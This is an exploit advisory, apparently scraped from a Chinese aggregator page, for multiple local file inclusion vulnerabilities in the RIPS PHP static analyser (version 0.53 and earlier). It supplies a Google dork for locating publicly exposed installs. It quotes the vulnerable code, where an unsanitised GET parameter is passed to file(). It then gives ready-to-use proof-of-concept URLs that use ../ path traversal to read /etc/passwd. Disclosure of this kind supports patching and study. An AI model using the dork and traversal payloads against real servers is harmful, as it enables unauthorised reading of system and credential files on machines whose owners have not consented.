扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
# RIPS <= 0.53 Multiple Local File Inclusion Vulnerabilities # Google Dork: allintitle: "RIPS - A static source code analyser for vulnerabilities in PHP scripts" # Althout this script is not intended to be accesible from internet, there are some websites that host it. # Download: http://sourceforge.net/projects/rips-scanner/ # Date: 23/03/12 # Contact: mattdch0@gmail.com # Follow: @mattdch # www.localh0t.com.ar File: /windows/code.php ======================= 102: file $lines = file($file); 96: $file = $_GET['file']; PoC: http://localhost/rips/windows/code.php?file=../../../../../../etc/passwd File: /windows/function.php =========================== 64: file $lines = file($file); 58: $file = $_GET['file']; PoC: http://localhost/rips/windows/function.php?file=../../../../../../etc/passwd(will read the first line of the file) |
体验盒子
